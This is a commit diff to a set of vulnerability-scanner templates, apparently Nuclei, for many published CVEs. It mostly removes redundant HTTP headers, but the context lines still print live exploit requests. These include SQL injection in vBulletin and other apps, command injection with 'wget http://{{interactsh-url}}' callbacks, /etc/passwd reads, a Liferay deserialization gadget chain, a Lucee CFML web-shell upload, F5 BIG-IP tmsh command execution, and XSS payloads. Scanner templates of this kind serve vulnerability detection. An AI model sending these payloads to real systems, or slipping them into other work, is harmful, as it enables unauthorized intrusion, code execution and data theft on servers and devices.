Accept-Language: en-US,en;q=0.9
Connection: close
Origin: {{BaseURL}}
Referer: {{BaseURL}}/artifactory/webapp/
{"user":"access-admin","password":"password","type":"login"}

View File

@ -15,24 +15,17 @@ requests:
- |
GET /api/experimental/test HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
- |
POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
Content-Length: 85
Content-Type: application/json
{"conf": {"message": "\"; touch test #"}}
@ -40,8 +33,6 @@ requests:
- |
GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
Host: {{Hostname}}
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*

View File

@ -13,10 +13,8 @@ requests:
- |
POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Content-Length: 218
Accept: */*
Content-Type: application/x-www-form-urlencoded
nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-

View File

@ -10,33 +10,22 @@ info:
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
# prior, to execute code as the root user.
# Authentication is bypassed by sending a random whitelisted Referer
# header in each request.
# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
requests:
- method: GET
path:
# Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
# Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
- "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
- "{{BaseURL}}/webadmin/out"
headers:
Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
Connection: "close"
Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
matchers-condition: and
matchers:
- type: word
words:
- "nonexistent"
part: body
- type: status
status:
- 200

View File

@ -13,13 +13,11 @@ requests:
- |
GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
- |
GET /include/nuclei.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: application/x-www-form-urlencoded
matchers-condition: and

View File

@ -14,7 +14,6 @@ requests:
- |
POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
matchers-condition: and
matchers:

View File

@ -13,16 +13,12 @@ requests:
- |
GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
- |
GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
cookie-reuse: true
matchers-condition: and
@ -33,6 +29,7 @@ requests:
- "Position: ||whoami||"
- "root"
condition: and
part: body
- type: status
status:

View File

@ -16,9 +16,7 @@ requests:
POST /jars/upload HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"

View File

@ -14,25 +14,14 @@ requests:
GET /?p=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 745
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
Origin: {{BaseURL}}
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: {{BaseURL}}
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
------WebKitFormBoundary88AhjLimsDMHU1Ak
Content-Disposition: form-data; name="action"

View File

@ -13,34 +13,21 @@ requests:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
DNT: 1
Connection: close
Cookie: uid=6gPjT2ipmNz
Upgrade-Insecure-Requests: 1
Content-Length: 0
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "nobody:[x*]:65534:65534"

View File

@ -19,9 +19,7 @@ requests:
POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Length: 608
Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
Connection: close
--------------------------ca81ac1fececda48
Content-Disposition: form-data; name="reqid"

View File

@ -15,18 +15,14 @@ requests:
- |
POST /cgi-bin/system_mgr.cgi? HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
- |
POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
matchers:
- type: word

View File

@ -15,9 +15,7 @@ requests:
- |
POST /login.htm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=

View File

@ -16,17 +16,10 @@ requests:
- |
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
- |
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
matchers:
- type: word

View File

@ -14,10 +14,7 @@ requests:
POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
X-Requested-With: XMLHttpRequest
Content-Type: application/json
User-Agent: Ophion SecurityGroup
Accept-Language: en-US,en;q=0.9
{"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}

View File

@ -13,12 +13,9 @@ requests:
- |
POST /goform/setSysAdm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/login.shtml
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login.shtml
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1

View File

@ -17,7 +17,6 @@ requests:
POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E

View File

@ -14,30 +14,16 @@ requests:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Length: 269
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBJ17hSJBjuGrnW92
Content-Disposition: form-data; name="action"
@ -52,11 +38,6 @@ requests:
- |
GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
extractors:
- type: regex

View File

@ -15,14 +15,6 @@ requests:
- |
GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
Upgrade-Insecure-Requests: 1
matchers:
- type: word

View File

@ -15,8 +15,6 @@ requests:
POST /dfsms/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 66
username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=

View File

@ -26,11 +26,13 @@ requests:
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
- "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
- "{{BaseURL}}/hsqldb%0a"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
@ -38,41 +40,35 @@ requests:
- "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
- "HSQL Database Engine Servlet"
condition: or
part: body
- raw:
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=create%20cli%20alias%20private%20list%20command%20bash
- |
POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=list%20%2Ftmp%2Fnonexistent
- |
POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
Host: {{Hostname}}
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
command=delete%20cli%20alias%20private%20list
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "h3ll0_w0Rld"

View File

@ -14,9 +14,6 @@ requests:
- |
GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
matchers:
- type: word

View File

@ -7,6 +7,7 @@ info:
tags: cve,cve2020,rce,liferay
description: Deserialization of Untrusted Data in Liferay Portal prior to 7.2.1 CE GA2 allows remote attackers to execute arbitrary code via JSON web services (JSONWS).
reference:
- https://www.synacktiv.com/en/publications/how-to-exploit-liferay-cve-2020-7961-quick-journey-to-poc.html
- https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
- https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/117954271
@ -15,14 +16,8 @@ requests:
- |
POST /api/jsonws/invoke HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
Content-Length: 4938
Accept: */*
Accept-Language: en
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
X-Requested-With: XMLHttpRequest
cmd2: §command§
cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
@ -39,8 +34,7 @@ requests:
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
condition: or
part: body
- type: status
status:
- 200
@ -50,4 +44,4 @@ requests:
part: body
regex:
- "Microsoft Windows (.*)"
- "Distributor ID: (.*)"
- "Distributor ID: (.*)"

View File

@ -14,23 +14,18 @@ requests:
- |
POST /menu/stapp HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
X-NITRO-USER: xpyZxwy6
sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
matchers-condition: and
matchers:
- type: word
words:
- "</title><script>alert(31337)</script>"
part: body
- type: status
status:
- 200

View File

@ -15,7 +15,6 @@ requests:
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Content-Type: application/xml
X-NITRO-USER: xpyZxwy6
X-NITRO-PASS: xWXHUJ56
@ -25,30 +24,18 @@ requests:
- |
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/neo HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
GET /menu/stc HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
- |
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
@ -59,9 +46,6 @@ requests:
- |
POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.24.0
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: oY39DXzQ
X-NITRO-PASS: ZuU9Y9c1
@ -70,20 +54,14 @@ requests:
<clipermission></clipermission>
cookie-reuse: true
# Using cookie-reuse to maintain session between each request, same as browser.
extractors:
- type: regex
name: randkey
name: randkey # dynamic variable
part: body
internal: true
regex:
- "(?m)[0-9]{3,10}\\.[0-9]+"
# Using rand_key as dynamic variable to make use of extractors at run time.
matchers:
- type: regex
regex:

View File

@ -5,23 +5,15 @@ info:
author: dwisiswant0
severity: high
tags: cve,cve2020,citrix
description: |
Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
reference:
- https://support.citrix.com/article/CTX276688
description: Reflected code injection in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows the modification of a file download.
reference: https://support.citrix.com/article/CTX276688
requests:
- raw:
- |
GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Connection: close
Cookie: startupapp=st
Upgrade-Insecure-Requests: 1
matchers-condition: and
matchers:
@ -29,10 +21,12 @@ requests:
words:
- "<jnlp codebase=\"nonexistent.1337\">"
part: body
- type: word
words:
- "application/x-java-jnlp-file"
part: header
- type: status
status:
- 200

View File

@ -15,9 +15,6 @@ requests:
- |
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a

View File

@ -14,10 +14,6 @@ requests:
- |
GET /graph_realtime.php?action=init HTTP/1.1
Host: {{Hostname}}
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}}
matchers:

View File

@ -12,8 +12,6 @@ requests:
path:
- "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
- "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
headers:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers-condition: and
matchers:

View File

@ -21,9 +21,7 @@ requests:
- |
POST /storfs-asup HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Content-Length: 78
Content-Type: application/x-www-form-urlencoded
action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`

View File

@ -24,11 +24,7 @@ requests:
Host: {{Hostname}}
Cookie: lang=8; url=ping.html; mobile=false;
Referer: {{BaseURL}}/info.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 178
matchers-condition: and
matchers:

View File

@ -16,24 +16,13 @@ requests:
- |
POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
imgSrc=a
- |
POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 790
imgSrc=
<cfoutput>
@ -62,13 +51,11 @@ requests:
</pre>
</cfif>
</cfoutput>
- |
POST /lucee/{{randstr}}.cfm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
cmd=id&opts=&timeout=5

View File

@ -18,7 +18,6 @@ requests:
- |
POST /wp-json/buddypress/v1/signup HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: application/json; charset=UTF-8
{

View File

@ -14,7 +14,6 @@ requests:
POST /casa/nodes/thumbprints HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
["127.0.0.1:443/ui/"]

View File

@ -19,8 +19,6 @@ requests:
Host: {{Hostname}}
Accept: */*
Content-Type: application/json
Content-Length: 86
Connection: close
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}

View File

@ -16,10 +16,8 @@ requests:
- |
POST /api/v4/ci/lint?include_merged_yaml=true HTTP/1.1
Host: {{Hostname}}
